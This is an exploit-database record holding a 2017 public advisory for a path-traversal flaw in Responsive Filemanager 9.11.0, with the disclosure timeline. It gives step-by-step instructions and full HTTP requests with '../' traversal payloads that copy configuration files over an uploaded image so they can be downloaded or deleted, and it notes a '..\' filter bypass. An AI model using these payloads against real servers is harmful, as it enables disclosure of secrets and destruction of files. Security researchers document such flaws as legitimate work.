{"lastseen": "2020-04-01T19:04:45", "references": [], "description": "\nResponsive Filemanager 9.11.0 - Arbitrary File Disclosure", "edition": 1, "reporter": "Wiswat Aswamenakul", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2017-02-07T00:00:00", "title": "Responsive Filemanager 9.11.0 - Arbitrary File Disclosure", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-02-07T00:00:00", "id": "EXPLOITPACK:786F9530DBEFEE36DA0CEF029665AC8F", "href": "", "viewCount": 6, "sourceData": "[+] Exploit Title: Responsive Filemanager <= 9.11.0 - Arbitrary File Disclosure/Deletion\n[+] Date: 7 Feb 2017\n[+] Vulnerability and Exploit Author: Wiswat Aswamenakul\n[+] Vendor Homepage: http://www.responsivefilemanager.com/\n[+] Affected version: only tested on 9.11.0 and 9.7.3 (other versions might be affected)\n[+] Tested on: Ubuntu 14.04, PHP 5.5.9\n[+] Category: webapps\n\n[+] Description\nResponsive Filemanager is a PHP-based file manager that makes use of AJAX\ntechnology. Among its features is copy/cut and paste of files. However,\nthe copy/cut feature does not sanitize the name of the file to be\ncopied/cut. Therefore, an attacker can copy/cut any file, including PHP\nfiles, and paste it over an existing image file. The attacker can then\ndownload the overwritten image file to read the content of the copied/cut\nfile. Moreover, with the cut feature, the original file is deleted as well.\n\n[+] Exploit\n1. Upload a normal image file (jpg, png, gif) to a server\n2. Right-click any file, select copy and capture the request with Burp Suite (or any local proxy)\n3. Change parameter \"path\" to any file name that we would like to download, for example, path=../filemanager/config/config.php\n\n###\nPOST /fm/filemanager/ajax_calls.php?action=copy_cut HTTP/1.1\nHost: 192.168.1.128\nContent-Length: 53\nAccept: */*\nOrigin: http://192.168.1.128\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\nlike Gecko) Chrome/55.0.2883.87 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:\nhttp://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=%2F&5869110e2a073\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.8\nCookie: last_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0\nConnection: close\n\npath=../filemanager/config/config.php&sub_action=copy\n###\n\n4. Go to any subdirectory, right-click any file, intercept the request with Burp, select \"Paste to this directory\"\n5. Change parameter \"path\" to the image file uploaded in step 1, for example, path=subdir/size.png\n\n###\nPOST /fm/filemanager/execute.php?action=paste_clipboard HTTP/1.1\nHost: 192.168.1.128\nContent-Length: 20\nAccept: */*\nOrigin: http://192.168.1.128\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\nlike Gecko) Chrome/55.0.2883.87 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:\nhttp://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=subdir%2F&5869110f9a268\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.8\nCookie: last_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0\nConnection: close\n\npath=subdir/size.png\n###\n\n6. Download the image file uploaded in step 1; it will contain the content of the file specified in step 3\n\n[+] Note (about another issue I found)\nDuring this report, I found another separate issue with the attack filtering, which only checks for \"../\" but not \"..\\\", which can be used to bypass all filters if the application runs on a Windows server, and reported the issue to the owner as well. However, I found out that this issue was found by a guy from hacktizen and detailed in the following blog post\nhttp://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html\nSo, the credit goes to the guy who first reported it. Perhaps the guy from hacktizen did not contact the owner of Responsive Filemanager, or there were problems with communication. Therefore, the issue remains unresolved.\n\n[+] Timeline\n- 02/01/2017: Contact Owner\n- 05/02/2017: Patched version is available\n- 07/02/2017: Public Advisory", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645789995}}